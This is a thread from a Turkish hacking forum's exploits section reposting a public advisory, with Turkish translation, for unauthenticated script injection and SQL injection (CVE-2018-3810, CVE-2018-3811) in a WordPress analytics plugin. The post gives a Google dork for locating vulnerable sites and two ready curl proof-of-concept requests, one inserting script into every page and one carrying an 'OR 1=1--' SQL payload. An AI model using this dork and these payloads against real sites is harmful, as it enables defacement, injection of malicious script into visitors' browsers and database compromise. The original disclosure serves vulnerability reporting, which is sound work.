Turkhackteam.net/org - Turkish Hacking & Security Platform...  
Geri git   Turkhackteam.net/org - Turkish Hacking & Security Platform... >
Turkhackteam Under Ground
> Exploitler

Exploitler Exploit Nedir ? Nasıl Kullanılır Ve Yeni Çıkan Exploitler Hakkında Bilgi ...

WordPress Smart Google Code Inserter Plugin

Exploitler

Yeni Konu aç Cevapla
 
Seçenekler
Alt bir Hafta önce   #1
  • Offline
  • Yüzbaşı
  • Genel Bilgiler
Üyelik tarihi
Jul 2015
Nereden
Şanlıurfa
Mesajlar
Konular


  
WordPress Smart Google Code Inserter Plugin



Exploit Title: Smart Google Code Inserter < 3.5 - Auth Bypass/SQLi
Google Dork: inurl:wp-content/plugins/smart-google-code-inserter/
Date: 26-Nov-17
Exploit Author: Benjamin Lim
Vendor Homepage: Oturia | WordPress Programming and Hosting
Software Link: https://wordpress.org/plugins/smart-...code-inserter/
Version: 3.4
Tested on: Kali Linux 2.0
CVE : CVE-2018-3810 (Authentication Bypass with resultant XSS)
CVE : CVE-2018-3811 (SQL Injection)


1. Product & Service Introduction:
==================================
Smart Google Code Inserter is a Wordpress plugin that makes it easy to add
Google Analytics tracking code as well as **** tag verification of
Webmaster Tools. As of now, the plugin has been downloaded 34,207 times and
has 9,000+ active installs.

2. Technical Details & Description:
===================================
Authentication Bypass vulnerability in the Smart Google Code Inserter
plugin 3.4 allows unauthenticated attackers to insert arbitrary javascript
or HTML code which runs on all pages served by Wordpress. The
saveGoogleCode() function in smartgooglecode.php does not check if the
current request is made by an authorized user, thus allowing any
unauthenticated user to successfully update the inserted code.

SQL Injection vulnerability, when coupled with the Authentication Bypass
vulnerability in the Smart Google Code Inserter plugin 3.4 allows
unauthenticated attackers to execute SQL queries in the context of the
webserver. The saveGoogleAdWords() function in smartgooglecode.php did not
use prepared statements and did not sanitize the $_POST["oId"] variable
before passing it as input into the SQL query.


Türkçesi :
Kod:
1. Ürün ve Hizmet Tanıtımı:
==================================
Akıllı Google Code Inserter, eklemeyi kolaylaştıran bir Wordpress eklentisidir
Google Analytics izleme kodu ve **** etiket doğrulaması
Webmaster araçları. Şu an itibariyle, eklenti 34.207 kez indirildi ve
9.000+ aktif yüklemesi var.
  
2. Teknik Ayrıntılar & Açıklamaları:
===================================
Akıllı Google Code Inser'inde kimlik doğrulama atlama güvenlik açığı
eklenti 3.4, kimliği doğrulanmamış saldırganların keyfi javascript eklemelerine izin verir.
veya Wordpress tarafından sunulan tüm sayfalarda çalışan HTML kodu.
smartgooglecode.php'deki saveGoogleCode () işlevi,
mevcut istek yetkili bir kullanıcı tarafından yapılır, böylece herhangi bir
kimliği doğrulanmamış kullanıcı, eklenen kodu başarıyla güncelleştirir.
  
Kimlik Doğrulama Bypass'ı ile birleşince SQL Injection güvenlik açığı
Akıllı Google Code Inser eklentisinde 3,4 güvenlik açığı izin verir
bağlamında SQL sorguları yürütecek kimliği doğrulanmamış saldırganlar
Web sunucusu. Smartgooglecode.php'deki saveGoogleAdWords () işlevi
hazırlanmış ifadeleri kullanın ve $ _POST ["oId"] değişkenini sıhhileştirmediniz
SQL sorgusuna girdi olarak iletmeden önce.
Kod:
3. Proof of Concept (PoC):
==========================
  
Code Insertion
  
curl -k -i --raw -X POST -d
"sgcgoogleanalytic=<script>alert("1");</script>&sgcwebtools=&button=Save+Changes&action=savegooglecode"
"http://localhost/wp-admin/options-general.php?page=smartcode" -H "Host:
localhost" -H "Content-Type: application/x-www-form-urlencoded"
  
SQL Injection
  
curl -k -i --raw -X POST -d "action=saveadwords&delconf=1&oId[]=1 OR
1=1--&ppccap[]=ex:mywplead&ppcpageid[]=1&ppccode[]=bb&nchkdel1=on" "
http://localhost/wp-admin/options-general.php?page=smartcode" -H "Host:
localhost" -H "Content-Type: application/x-www-form-urlencoded"

Exploit Alıntıdır . Anlayan Anladı . İyi Günler . İyi Forumlar .
    


__________________


Konu 'Black Warrior tarafından (4 Gün önce Saat 20:51 ) değiştirilmiştir..
Offline
 
Alıntı ile Cevapla
Alt 6 Gün önce   #2
  • Offline
  • Asteğmen
  • Genel Bilgiler
Üyelik tarihi
Aug 2011
Mesajlar
2
Konular
1


  


Tamam teşekkürler k.bakmayın
    
Offline
 
Alıntı ile Cevapla
Cevapla

Bookmarks

Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks Kapalı
Pingbacks Kapalı
Refbacks Kapalı


Bilgilendirme Turkhackteam.net/org
Sitemizde yer alan konular üyelerimiz tarafından açılmaktadır.
Bu konular yönetimimiz tarafından takip edilsede gözden kaçabilen telif hakkı olan veya mahkeme kararı çıkmış konular sitemizde bulunabilir. Bu tür konuları bize turkhackteamiletisim [at] gmail.com adresine mail atarak bildirdiğiniz takdirde en kısa sürede konular hakkında gerekli işlemler yapılacaktır.
Please Report Abuse, DMCA, Harassment, Scamming, Warez, Crack, Divx, Mp3 or any Illegal Activity to turkhackteamiletisim [at] gmail.com


Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz.
Turkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Turkhackteam sorumlu değildir. Sitelerinize Turkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.



         

Powered by vBulletin® Copyright ©2000 - 2018

TSK Mehmetçik Vakfı

Türk Polis Teşkilatını Güçlendirme Vakfı



Google Links
instagram Takipçi Hilesi

wau

Search Engine Friendly URLs by vBSEO 3.6.0 ©2011, Crawlability, Inc.